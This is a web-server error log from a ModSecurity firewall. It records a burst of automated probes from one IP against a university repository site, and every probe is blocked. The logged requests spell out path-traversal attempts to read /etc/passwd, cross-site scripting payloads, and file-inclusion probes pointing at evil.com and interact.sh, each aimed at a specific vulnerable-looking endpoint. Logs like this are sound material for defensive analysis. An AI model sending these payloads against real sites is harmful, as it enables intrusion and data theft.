[Tue Aug 29 11:55:23.555710 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:url: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/wp-custom-pages/wp-download.php"] [unique_id "ZO16O8Co-f0AAApbUgIAAAAh"]
[Tue Aug 29 11:55:23.937276 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:log. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:log: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/webadmin/reporter/view_server_log.php"] [unique_id "ZO16O8Co-f0AAAolKnUAAAAe"]
[Tue Aug 29 11:55:23.978878 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:format. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:format: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/atmail/"] [unique_id "ZO16O8Co-f0AAAoz8E4AAAAS"]
[Tue Aug 29 11:55:24.654875 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:operation. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:operation: 11111111</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet"] [unique_id "ZO16PMCo-f0AAApbUgoAAAAh"]
[Tue Aug 29 11:55:24.657758 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:format. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:format: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/atmail/webmail/"] [unique_id "ZO16PMCo-f0AAAqqtfMAAAAA"]
[Tue Aug 29 11:55:25.819512 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:language: \\x22><img src=x onerror=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/webmail/"] [unique_id "ZO16PcCo-f0AAAolKocAAAAe"]
[Tue Aug 29 11:55:25.967727 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:fccc'\\\\"><svg/onload. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: < found within ARGS_NAMES:fccc'\\x5c\\x5c\\x22><svg/onload: fccc'\\x5c\\x22><svg/onload"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repository.unla.ac.id"] [uri "/webapp/"] [unique_id "ZO16PcCo-f0AAAqeFWEAAAAx"]
[Tue Aug 29 11:55:26.639328 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:q: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/search/"] [unique_id "ZO16PsCo-f0AAAoAlAgAAAAC"]
[Tue Aug 29 11:55:28.621287 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:type: ../../../../../../../../../../../etc/./passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/horde/util/barcode.php"] [unique_id "ZO16QMCo-f0AAApXgp4AAAAU"]
[Tue Aug 29 11:55:29.874682 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:layout. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:layout: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/badging/badge_template_v0.php"] [unique_id "ZO16QcCo-f0AAApXgrIAAAAU"]
[Tue Aug 29 11:55:30.532484 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/wp-planet/rss.class/scripts/magpie_debug.php"] [unique_id "ZO16QsCo-f0AAAolKqcAAAAe"]
[Tue Aug 29 11:55:30.728596 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16QsCo-f0AAAqSwuUAAAAN"]
[Tue Aug 29 11:55:31.694407 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://evil.com found within TX:1: evil.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repository.unla.ac.id"] [uri "/html/common/forward_js.jsp"] [unique_id "ZO16Q8Co-f0AAAqY6FIAAAAr"]
[Tue Aug 29 11:55:32.572471 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:login-error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:login-error: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO16RMCo-f0AAAqY6FkAAAAr"]
[Tue Aug 29 11:55:33.903684 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:query: <script>alert(document.domain);</script>=or"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/pmb/admin/convert/export_z3950.php"] [unique_id "ZO16RcCo-f0AAApXgsUAAAAU"]
[Tue Aug 29 11:55:36.064469 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:key: <img src onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repository.unla.ac.id"] [uri "/vendor/curl/curl/tests/server/php-curl-test/post_file_path_upload.php"] [unique_id "ZO16SMCo-f0AAApHRjIAAAAP"]
[Tue Aug 29 11:55:36.262907 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:include_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:include_file: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16SMCo-f0AAAqTvucAAAAa"]
[Tue Aug 29 11:55:36.537076 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16SMCo-f0AAAq5@B4AAAAK"]
[Tue Aug 29 11:55:37.964914 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repository.unla.ac.id"] [uri "/labkey/__r1/login-login.view"] [unique_id "ZO16ScCo-f0AAAqSwwIAAAAN"]
[Tue Aug 29 11:55:38.063040 2023] [:error] [pid 2744] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:prod. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: `;// found within ARGS:prod: ';prompt`document.domain`;//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/gsearch.php.en"] [unique_id "ZO16SsCo-f0AAAq4fVgAAAAJ"]
[Tue Aug 29 11:55:38.731177 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:q: <img src=x onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repository.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16SsCo-f0AAAqSwwwAAAAN"]
[Tue Aug 29 11:55:39.840077 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:subpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:subpage: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/WebMstr7/servlet/mstrWeb"] [unique_id "ZO16S8Co-f0AAApHRkMAAAAP"]
[Tue Aug 29 11:55:40.112314 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at REQUEST_COOKIES:svpnlang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within REQUEST_COOKIES:svpnlang: <script>alert('document.domain')</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/wnm/login/login.json"] [unique_id "ZO16TMCo-f0AAAqTvwEAAAAa"]
[Tue Aug 29 11:55:41.940593 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:link_url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:link_url: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/Ajax_url_encode.php"] [unique_id "ZO16TcCo-f0AAAqqthwAAAAA"]
[Tue Aug 29 11:55:43.736757 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:port. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:port: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/fw/syslogViewer.do"] [unique_id "ZO16T8Co-f0AAAolKvQAAAAe"]
[Tue Aug 29 11:55:44.019279 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:keyword. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:keyword: \\x22><script>alert(1337)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/sell-media-search/"] [unique_id "ZO16UMCo-f0AAAqSwzAAAAAN"]
[Tue Aug 29 11:55:44.637164 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:nodatamsg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:nodatamsg: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/wicket/resource/nl.planon.pssm.dashboard.cre.engine.wicket.page.AbstractDashboardPage/html/nodata.html"] [unique_id "ZO16UMCo-f0AAAqqti0AAAAA"]
[Tue Aug 29 11:55:44.669179 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:cid: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/component/music/album.html"] [unique_id "ZO16UMCo-f0AAAqeFaoAAAAx"]
[Tue Aug 29 11:55:45.699220 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repository.unla.ac.id"] [uri "/redirector.php"] [unique_id "ZO16UcCo-f0AAAqeFa4AAAAx"]
[Tue Aug 29 11:55:46.612114 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16UsCo-f0AAApbUoAAAAAh"]
